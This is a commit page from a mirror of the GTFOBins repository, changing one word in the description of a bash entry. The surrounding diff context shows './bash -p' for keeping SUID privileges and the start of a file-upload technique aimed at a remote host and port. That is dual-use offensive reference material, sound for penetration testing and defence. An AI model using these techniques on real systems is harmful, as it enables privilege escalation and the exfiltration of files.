1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-11-10 02:11:53 +01:00

Rephrase bash

This commit is contained in:
Emilio Pinna 2018-05-22 21:17:51 +01:00
parent e3d9c03c96
commit d9612ec461

@ -7,7 +7,7 @@ functions:
suid-enabled:
- code: ./bash -p
upload:
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file from the other end.
- description: Send local file in the body of an HTTP POST request. Run an HTTP service to collect the file on the other end.
code: |
RHOST=10.0.0.1
RPORT=8000